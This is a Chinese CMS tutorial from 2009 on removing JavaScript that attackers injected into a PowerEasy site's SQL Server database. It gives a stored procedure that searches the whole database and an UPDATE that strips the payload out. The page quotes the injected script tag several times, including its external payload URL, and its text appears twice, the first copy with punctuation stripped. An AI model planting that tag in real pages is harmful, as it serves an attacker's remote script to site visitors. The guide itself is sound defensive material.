解析【木马】手动删除动易数据库被注入JS代码的方法 - 动易cms - 爱建站

,,,,CMS教程,模板无忧,建站教程,CMS教程,动易Cms教程,

SEO SEO


首页  >   动易cms > 解析【木马】手动删除动易数据库被注入JS代码的方法  >  正文







 

问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢? 数据库被注入的代码是:">< title><script src="http: www2 s800qn cn csrss w js">< script><!--   解决:发现在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一个一个去查,是比较费时费力的,那么我们可以通过一个全库搜索的方法,建立一个存储过程 create   proc   p_search     @str   Nvarchar(1000)   --要搜索的字符串     as     if   @str=    return         declare   @s   Nvarchar(4000)     create   table   t(表名   sysname,字段名   sysname)         declare   tb   cursor   local   for     select   s= if   exists(select   1   from   [ +replace(b name, ] , ]] )+ ]   where   [ +a name+ ]   like   N % [email protected]+ % )     print   所在的表及字段:   [ +b name+ ] [ +a name+ ]      from   syscolumns   a   join   sysobjects   b   on   a id=b id     where   b xtype= U    and   a status>=0     and   a xtype   in(175,239,99,35,231,167)     open   tb     fetch   next   from   tb   into   @s     while   @@fetch_status=0     begin     exec(@s)     fetch   next   from   tb   into   @s     end     close   tb     deallocate   tbGO 执行:p_search ">< title><script src="http: www2 s800qn cn csrss w js">< script><!-- 找到被注入的表及字段,执行恢复操作,下面是一个例子 UPDATE PE_Class SET Tips= Replace(Tips, ">< title><script src="http: www2 s800qn cn csrss w js">< script><!-- , )   注意:以上虽然能较方便的处理木马代码,但我们仍要对网站文件进行清查工作,不然网站是会反复中木马的,特别是对于有生成静态页面的网站,我们要重新生成下网站页面,以正常的生成页面覆盖现有木马代码的页面   查看更多 动易Cms教程  动易Cms模板 来源:模板无忧 所属分类:动易Cms教程 更新时间:2009-06-22 [收藏][报错][返回列表] 相关动易Cms教程: MAC错误的解决方法 如何屏蔽动易后台导航里的某个功能菜单? 动易 NET版本留言自动选定栏目方法 动易SiteFactoty整合Discuz!NT3 0 在任意位置获取根节点ID标签 如何开启SiteWeaver6 8的支持,反对功能 Windows 2008安装动易 NET系统之四----动易系统安装篇 Windows 2008安装动易 NET系统之三----数据库篇 Windows 2008安装动易 NET系统之二----IIS、目录环境配置篇 数据库修复,SQL Server 2005内部操作不一致的处理 如何安装动易 net程序权限配置 为什么提示对Windows系统文件夹下的Temp目录没有访问权限? 动易Cms教程教程Rss订阅Cms教程搜索 动易Cms教程推荐 IIS 内存不够用的一种解决方法为什么文章内容页ArticleContent(200)不能显示简介?XSLT标签简单教程(使用DW8编辑标签)如何在文章内容页插入画中画广告效果?如何解决部分1 2的标签在2 0模板解析引擎中导致整个页面异常的问如何在一个标签中调用显示多个栏目中的内容?怎样修改调用的日期格式到具体分秒?怎样才能使SiteFactory运行时出现具体详细信息如何将留言簿的查看模式由讨论区方式改为留言板方式?[注意]关于已经中木马网站的相关处理办法(2 26 ) 猜你也喜欢看这些 啸秋中学2006SP3_Build20061102防QQ清新飘梦模板完整无缺页版HOTTOP娱乐网FOR动易2006sp1静宁成纪中学网站程序2006第二版提供下载重庆荣昌职教适合学校的模板衢州电脑网现SP3已提供下载索忆网络DIV+CSS动易2006整站模板动易论坛创艺时空模板Diy吧网络新生代潇湘人家2006模板 相关链接:复制本页链接|   搜索解析【木马】手动删除动易数据库被注入JS代码的方法教程说明:动易Cms教程-解析【木马】手动删除动易数据库被注入JS代码的方法



问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢?

数据库被注入的代码是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--

 

解决:发现在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一个一个去查,是比较费时费力的,那么我们可以通过一个全库搜索的方法,建立一个存储过程

create   proc   p_search  
  @str   Nvarchar(1000)   --要搜索的字符串  
  as  
  if   @str=""   return  
   
  declare   @s   Nvarchar(4000)  
  create   table   #t(表名   sysname,字段名   sysname)  
   
  declare   tb   cursor   local   for  
  select   s="if   exists(select   1   from   ["+replace(b.name,"]","]]")+"]   where   ["+a.name+"]   like   N""%"[email protected]+"%"")  
  print   ""所在的表及字段:   ["+b.name+"].["+a.name+"]"""  
  from   syscolumns   a   join   sysobjects   b   on   a.id=b.id  
  where   b.xtype="U"   and   a.status>=0  
  and   a.xtype   in(175,239,99,35,231,167)  
  open   tb  
  fetch   next   from   tb   into   @s  
  while   @@fetch_status=0  
  begin  
  exec(@s)  
  fetch   next   from   tb   into   @s  
  end  
  close   tb  
  deallocate   tb
GO


执行:p_search ""></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--"

找到被注入的表及字段,执行恢复操作,下面是一个例子

UPDATE PE_Class SET Tips= Replace(Tips,""></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--","")
 
注意:以上虽然能较方便的处理木马代码,但我们仍要对网站文件进行清查工作,不然网站是会反复中木马的,特别是对于有生成静态页面的网站,我们要重新生成下网站页面,以正常的生成页面覆盖现有木马代码的页面
 

查看更多 动易Cms教程  动易Cms模板


解析【木马】手动删除动易数据库被注入JS代码的方法
http://www.yuedudg.cn/article/1992161.html

 










Tags: CMS教程 模板无忧 建站教程 CMS教程 动易Cms教程








手机浏览本文
解析【木马】手动删除动易数据库被注入JS代码的方法

解析【木马】手动删除动易数据库被注入JS代码的方法




搜索


网站分类


标签列表


关于我们
本站主机域名成本巨大,无以为继,希望想在本站做宣传的老板可以联系我们!以维持我们网站的正常运行!感谢
联系我们: 给我发QQ消息  加入QQ群